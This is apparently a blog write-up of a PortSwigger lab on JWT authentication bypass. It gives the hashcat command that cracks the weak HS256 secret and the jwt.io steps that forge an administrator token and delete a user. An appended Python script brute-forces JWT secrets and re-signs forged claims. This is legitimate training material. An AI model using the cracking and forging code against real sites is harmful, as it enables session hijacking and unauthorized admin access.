22.3 Lab: JWT authentication bypass via weak signing key

Karthikeyan Nagaraj
2 min read · May 17, 2024

Description

This lab uses a JWT-based mechanism for handling sessions. It uses an extremely weak secret key to both sign and verify tokens. This can be easily brute-forced using a wordlist of common secrets.

To solve the lab, first brute-force the website’s secret key. Once you’ve obtained this, use it to sign a modified session token that gives you access to the admin panel at /admin, then delete the user carlos.

You can log in to your own account using the following credentials: wiener:peter

Tip

We recommend familiarizing yourself with how to work with JWTs in Burp Suite before attempting this lab.

We also recommend using hashcat to brute-force the secret key. For details on how to do this, see Brute forcing secret keys using hashcat.

Solution

Part 1 — Brute-force the secret key

  1. Enable the browser proxy, turn Intercept off in Burp, and open the Proxy > HTTP history tab.
  2. Log in to your account with wiener:peter.
  3. Send the GET /my-account?id=wiener request to Repeater.
  4. Copy the value of the session cookie (the JWT), open a terminal, and run hashcat in dictionary mode (-a 0) with the JWT hash mode (-m 16500) against a wordlist of common secrets:
    hashcat -a 0 -m 16500 "JWT_COOKIE" /usr/share/seclists/Passwords/scraped-JWT-secrets.txt
  5. If everything works correctly, hashcat reports the weak secret as secret1. If you run the command a second time, hashcat only says the hash was already found in its potfile; add --show to the same command to print the cracked secret again.

Part 2 — Modify and sign the JWT

  1. Go to https://jwt.io and paste the JWT cookie that you copied from Repeater.
  2. In the Payload box, change the value of the sub claim from wiener to administrator. Leave the header alone: alg must stay HS256, because the server verifies with the same shared secret you just cracked.
  3. In the Verify Signature box, replace the placeholder "your-256-bit-secret" with secret1 (or whichever secret hashcat recovered) and leave the option that treats the secret as base64-encoded unchecked. The encoded token on the left is re-signed as you type, and the debugger should report the signature as verified.
  4. Copy the final JWT from the Encoded box on the left and go back to Repeater.
  5. Change the path to /admin/delete?username=carlos and replace the session cookie value with the token copied from jwt.io. You can first request /admin with the forged cookie to confirm that the admin panel loads.
  6. Send the request; the lab is solved.
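Worked example, added here and not part of the original write-up or of the PortSwigger lab: a stdlib-only Python script that does both parts of the solution offline, the dictionary attack of Part 1 (the same HMAC-per-candidate loop hashcat -m 16500 runs, only slower) and the re-signing of Part 2 (what jwt.io does when you type the secret into the Verify Signature box). Everything in it is constructed: the cookie is built inside the script with the lab's known weak secret so it runs without a lab instance, the claim names and kid value are assumed, and WORDLIST is a six-entry stand-in for scraped-JWT-secrets.txt. Against a real cookie you would pass the cookie string and a full wordlist to crack_secret instead.

```python
"""Offline HS256 JWT secret brute-force and re-signing (stdlib only)."""
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional


def b64url_encode(data: bytes) -> str:
    """Base64url without padding, the encoding JWT segments use."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    """Restore the padding JWT segments omit, then decode."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def hs256(signing_input: bytes, secret: str) -> bytes:
    """HS256 is HMAC-SHA256 over the ASCII bytes of 'header.payload'."""
    return hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()


def make_token(header: dict, payload: dict, secret: str) -> str:
    """Build and sign a compact JWS (compact JSON, as most libraries emit)."""
    h = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hs256(f"{h}.{p}".encode(), secret)
    return f"{h}.{p}.{b64url_encode(sig)}"


def verify(token: str, secret: str) -> bool:
    """Recompute the signature and compare in constant time."""
    h, p, s = token.split(".")
    return hmac.compare_digest(hs256(f"{h}.{p}".encode(), secret), b64url_decode(s))


def claims(token: str) -> dict:
    """Decode the payload segment without checking the signature."""
    return json.loads(b64url_decode(token.split(".")[1]))


def crack_secret(token: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: one HMAC per candidate until one reproduces the signature."""
    h, p, s = token.split(".")
    signing_input = f"{h}.{p}".encode()
    target = b64url_decode(s)
    for candidate in wordlist:
        if hmac.compare_digest(hs256(signing_input, candidate), target):
            return candidate
    return None


def forge_token(token: str, secret: str, **new_claims) -> str:
    """Change claims and re-sign; the header segment is reused byte-for-byte."""
    h, p, _ = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") != "HS256":
        raise ValueError(f"expected HS256, got {header.get('alg')!r}")
    payload = json.loads(b64url_decode(p))
    payload.update(new_claims)
    p2 = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    return f"{h}.{p2}.{b64url_encode(hs256(f'{h}.{p2}'.encode(), secret))}"


# Constructed stand-ins (assumptions, not data taken from the lab): the cookie is
# built here with the lab's weak secret so the script runs offline; the kid value
# and claim names are made up for the example.
WEAK_SECRET = "secret1"
SAMPLE_COOKIE = make_token(
    {"kid": "constructed-kid", "alg": "HS256"},
    {"iss": "portswigger", "exp": 1716000000, "sub": "wiener"},
    WEAK_SECRET,
)
# A few entries standing in for scraped-JWT-secrets.txt.
WORDLIST = ["password", "secret", "changeme", "jwt_secret", "secret1", "supersecret"]


if __name__ == "__main__":
    found = crack_secret(SAMPLE_COOKIE, WORDLIST)
    print("cracked secret:", found)
    forged = forge_token(SAMPLE_COOKIE, found, sub="administrator")
    print("forged cookie:", forged)
    print("verifies with cracked secret:", verify(forged, found))
    print("claims:", claims(forged))
```

forge_token keeps the original header segment rather than re-encoding it, so any kid or other header field the server keys on survives unchanged and only the payload and signature differ from the cookie you were issued. It also refuses tokens whose alg is not HS256: cracking a shared secret buys you nothing against an RS256 token, and silently re-signing one would produce a cookie the server rejects.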
